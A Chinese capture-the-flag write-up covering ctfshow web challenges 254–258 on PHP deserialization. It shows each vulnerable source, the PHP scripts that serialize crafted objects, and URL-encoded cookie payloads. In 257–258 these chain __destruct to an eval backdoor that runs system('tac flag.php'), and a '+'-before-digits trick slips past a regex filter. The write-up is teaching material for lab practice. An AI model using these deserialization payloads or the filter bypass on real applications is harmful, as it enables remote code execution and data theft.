当前位置: 首页 > news >正文

ctfshow——web入门254~258

news 2025/5/18 6:55:48

目录

web入门254

web入门255

web入门256

web入门257

web入门258

反序列化

先来看看其他师傅的讲解

web入门254

源码:

<?phperror_reporting(0);
highlight_file(__FILE__);
include('flag.php');class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;public function checkVip(){return $this->isVip;}public function login($u,$p){if($this->username===$u&&$this->password===$p){$this->isVip=true;}return $this->isVip;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;echo "your flag is ".$flag;}else{echo "no vip, no flag";}}
}$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){$user = new ctfShowUser();if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}}else{echo "no vip,no flag";}
} ?>

payload:?username=xxxxxx&password=xxxxxx

简单分析就是传入的username和password的值回去当作login方法的参数,然后只要让他们和类中的值一样就好了

web入门255

源码:

<?phperror_reporting(0);
highlight_file(__FILE__);
include('flag.php');class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;echo "your flag is ".$flag;}else{echo "no vip, no flag";}}
}$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']);    if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}}else{echo "no vip,no flag";}
} 
?>

这里的unserialize就是反序列化,serialize是序列化(废话)

$user = unserialize($_COOKIE['user']);从cookie中找user,然后反序列化,所以我们要在脚本里先序列化

脚本:

注意这里的login方法中isYip的值不会改变,所以我们需要自己把他设置为1

<?phperror_reporting(0);
highlight_file(__FILE__);
include('flag.php');class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=1;public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;echo "your flag is ".$flag;}else{echo "no vip, no flag";}}
}
/*
$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']);    if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}}else{echo "no vip,no flag";}
} */
$a=new ctfShowUser();
echo serialize($a);?>

结果:O:11:"ctfShowUser":3:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";s:5:"isVip";i:1;}

然后在cookie的化需要url编码

payload:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

web入门256

源码:

<?phperror_reporting(0);
highlight_file(__FILE__);
include('flag.php');class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;if($this->username!==$this->password){echo "your flag is ".$flag;}}else{echo "no vip, no flag";}}
}$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']);    if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}}else{echo "no vip,no flag";}
}
if($this->username!==$this->password){echo "your flag is ".$flag;}

多了一层,这个是强比较

其实没什么必要,我们可以直接改public中的元素,就把username=xxxxx

<?phperror_reporting(0);
highlight_file(__FILE__);
include('flag.php');class ctfShowUser{public $username='xxxxx';public $password='xxxxxx';public $isVip=1;public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;if($this->username!==$this->password){echo "your flag is ".$flag;}}else{echo "no vip, no flag";}}
}
/*
$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']);    if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}}else{echo "no vip,no flag";}
} 
*/
$a=new ctfShowUser();
echo serialize($a);?>

结果:O:11:"ctfShowUser":3:{s:8:"username";s:5:"xxxxx";s:8:"password";s:6:"xxxxxx";s:5:"isVip";i:1;}

然后还是url编码,cookie传参

web入门257

源码:

<?php
error_reporting(0);
highlight_file(__FILE__);class ctfShowUser{private $username='xxxxxx';private $password='xxxxxx';private $isVip=false;private $class = 'info';public function __construct(){$this->class=new info();}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function __destruct(){$this->class->getInfo();}}class info{private $user='xxxxxx';public function getInfo(){return $this->user;}
}class backDoor{private $code;public function getInfo(){eval($this->code);}
}$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']);$user->login($username,$password);
}$a=new ctfShowUser();
echo serialize($a);?>

这题可以开始找链子了

我们看到backDoor类的getInfo方法,有一个eval($this->code);code就是我们要执行的代码

然后我们怎么调用他呢,看到ctfShowUser类中的 __destruct,但是如果照他的源代码,class=new info()

所以我们把他改成new backDoor

__destruct:析构函数,在对象的所有引用都被删除时或者对象被显式销毁时调用,当对象被销毁时自动调用

<?php
class ctfShowUser{private $class = 'info';public function __construct(){$this->class=new backDoor();}/* public function __destruct(){$this->class->getInfo();}
*/
}class info{private $user='xxxxxx';public function getInfo(){return $this->user;}
}class backDoor{private $code='system("ls");';public function getInfo(){eval($this->code);}
}
/*
$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']);$user->login($username,$password);
}
*/$a=new ctfShowUser();
$b=urlencode(serialize($a));
echo $b;?>

这里的url编码还是直接跑吧,我用hacker跑的用不了

user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D

web入门258
在数字前面+绕过正则

源码:

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 21:38:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/error_reporting(0);
highlight_file(__FILE__);class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;public $class = 'info';public function __construct(){$this->class=new info();}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function __destruct(){$this->class->getInfo();}}class info{public $user='xxxxxx';public function getInfo(){return $this->user;}
}class backDoor{public $code;public function getInfo(){eval($this->code);}
}$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){$user = unserialize($_COOKIE['user']);}$user->login($username,$password);
}

多了一个这个: if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user']))

匹配一个字符,大小写的 oc加上:+数字的形式

如: o:5:sadfg

然后我们看看正常脚本的结果:
O:11:"ctfShowUser":1:{s:5:"class";O:8:"backDoor":1:{s:4:"code";s:13:"system('ls');";}}

可以看到会被匹配到,要进行绕过:

用+绕过:(在数字前面加+)

O:+11:"ctfShowUser":1:{s:5:"class";O:+8:"backDoor":1:{s:4:"code";s:13:"system('ls');";}}

payload:user=O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system('tac%20flag.php')%3B%22%3B%7D%7D

脚本:(跟上题一样),出了直接手动改然后url编码

<?phpclass ctfShowUser{/*public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;*/public $class = 'info';public function __construct(){$this->class=new backDoor();}/*public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function __destruct(){$this->class->getInfo();}*/}class info{public $user='xxxxxx';public function getInfo(){return $this->user;}
}class backDoor{public $code="system('tac flag.php');";public function getInfo(){eval($this->code);}
}
/*
$username=$_GET['username'];
$password=$_GET['password'];if(isset($username) && isset($password)){if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){$user = unserialize($_COOKIE['user']);}$user->login($username,$password);
}*/$a=new ctfShowUser();
echo serialize($a);
echo "<br>";
$b=urlencode(serialize($a));
echo $b;?>

http://www.xdnf.cn/news/500653.html

相关文章:

  • JavaScript入门【2】语法基础
  • webpack 学习
  • 并发学习之synchronized,JVM内存图,线程基础知识
  • 【双指针】缺失的第一个正整数
  • Visual Studio2022跨平台Avalonia开发搭建
  • 混合学习:Bagging与Boosting的深度解析与实践指南
  • 系统架构设计(七):数据流图
  • 售前工作.工作流程和工具
  • 从专家编码到神经网络学习:DTM 的符号操作新范式
  • tp5 关键词搜索商品时进行关键词拆分
  • Slidev集成Chart.js:专业数据可视化演示文稿优化指南
  • 黄点追踪是什么?:揭秘打印机隐形识别机制的技术分析
  • windows编写和调试代码工具——IDE安装
  • QMK 宏(Macros)功能详解(实战部分)
  • muduo库TcpConnection模块详解——C++
  • CMake基础及操作笔记
  • C语言—再学习(结构体)
  • 【springcloud学习(dalston.sr1)】Zuul路由访问映射规则配置及使用(含源代码)(十二)
  • 玩转 AI · 思考过程可视化
  • 【gitee 初学者矿建仓库】
  • 【Ragflow】22.RagflowPlus(v0.3.0):用户会话管理/文件类型拓展/诸多优化更新
  • 51单片机课设基于GM65模块的二维码加条形码识别
  • python第二十八天
  • Oracle APEX IR报表下载CSV文件的方法
  • [Java] 方法和数组
  • FauxGen:一款由 CodeBuddy 主动构建的假数据生成器
  • 语音转文字
  • 使用Spring Boot与Spring Security构建安全的RESTful API
  • 基于大疆Mini 3无人机和指定软件工具链的完整3D建模工作
  • JavaScript防抖与节流全解析